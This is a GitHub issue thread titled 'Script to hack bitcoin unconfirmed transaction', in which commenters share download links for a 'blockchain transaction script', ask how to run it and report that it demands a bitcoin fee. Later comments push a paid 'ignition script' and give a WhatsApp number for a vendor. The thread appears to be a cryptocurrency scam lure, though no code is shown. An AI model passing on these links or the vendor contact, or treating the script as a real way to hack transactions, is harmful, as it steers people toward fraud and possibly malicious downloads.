### ISSUE TITLE
Script to hack bitcoin unconfirmed transaction 

### ISSUE THREAD

**Issue by venzaa** [button-tech/blockchain-ts-wallet-core#4]

**Comment by krboktv** [comment]
Could you provide a link?

**Comment by ghost** [comment]
Wat IS thé script

**Comment by Ghahuri** [comment]
[New Blockchain transaction script.txt](https://github.com/button-tech/blockchain-ts-wallet-core/files/7229135/New.Blockchain.transaction.script.txt)

**Comment by Ghahuri** [comment]
[New Blockchain transaction script.txt](https://github.com/button-tech/blockchain-ts-wallet-core/files/7229301/New.Blockchain.transaction.script.txt)

**Comment by timkfor69** [comment]
How to do the same script for Android 10

**Comment by yenado5175** [comment]
not working??

**Comment by chinta113** [comment]
How to verify the seript

**Comment by lukimoarco** [comment]
hello ... does anyone have a bitcoin generator ??

**Comment by Stanley-Richie** [comment]
Please who have verified the script??

**Comment by xo1707** [comment]
> Please who have verified the script??

?

**Comment by xo1707** [comment]
> Please who have verified the script??

Lol it's asking for 0.003 that's like 128$+

**Comment by ejrhe** [comment]
https://www.mediafire.com/file/gdklp91z1gd98b8/Blcokchain.transaction.script.txt/file

**Comment by lukimoarco** [comment]
Hello

wt., 8 lis 2022, 12:20 użytkownik ejrhe ***@***.***> napisał:

**Comment by Budysupu33** [comment]
Hallo...apakah ada yang punya script transaksi blockchain,boleh bagikan dong....

**Comment by Toxichack7** [comment]
> Hallo...apakah ada yang punya script transaksi blockchain,boleh bagikan dong....

Do you still need it?

**Comment by ejrhe** [comment]
No sir thanks

**Comment by venzaa** [comment]
Yes bro I really need it

**Comment by ashwinlohani** [comment]
how can i get the script without transaction fee

**Comment by Toxichack7** [comment]
Simple just buy the ignition script

**Comment by ashwinlohani** [comment]
how can i get the ignition script??

**Comment by Toxichack7** [comment]
Text the vendor on WhatsApp +1 (202) 703-2617 and tell him what you need.
